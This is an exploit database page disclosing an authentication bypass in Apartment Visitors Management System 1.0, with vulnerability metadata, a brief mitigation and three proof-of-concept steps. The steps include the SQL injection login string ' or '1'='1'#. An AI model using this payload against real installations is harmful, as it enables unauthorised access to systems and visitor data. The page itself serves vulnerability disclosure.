header-logo
Suggest Exploit
vendor:
Apartment Visitors Management System
by:
Kshitiz Raj(manitorpotterk)
8.8
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Apartment Visitors Management System
Affected Version From: V1.0
Affected Version To: V1.0
Patch Exists: No
Related CWE: N/A
CPE: a:phpgurukul:apartment_visitors_management_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10, Kali Linux
2020

Apartment Visitors Management System 1.0 – Authentication Bypass

Apartment Visitors Management System 1.0 is vulnerable to authentication bypass. An attacker can bypass authentication by entering ' or '1'='1'# as the username and any value as the password.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.
Source

Exploit-DB raw data:

# Exploit Title: Apartment Visitors Management System 1.0 - Authentication Bypass
# Date: 2020-12-24 
# Exploit Author:  Kshitiz Raj(manitorpotterk)
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: V1.0 
# Tested on: Windows 10/Kali Linux

Step 1 -  Go to url http://localhost/avms/index.php
<http://localhost/avms/index.php>*

Step 2 – Enter Username :-   ' or '1'='1'# *

Step 3 -  Enter Password - anything*

Navigation

Suggest Exploit

Services By CQR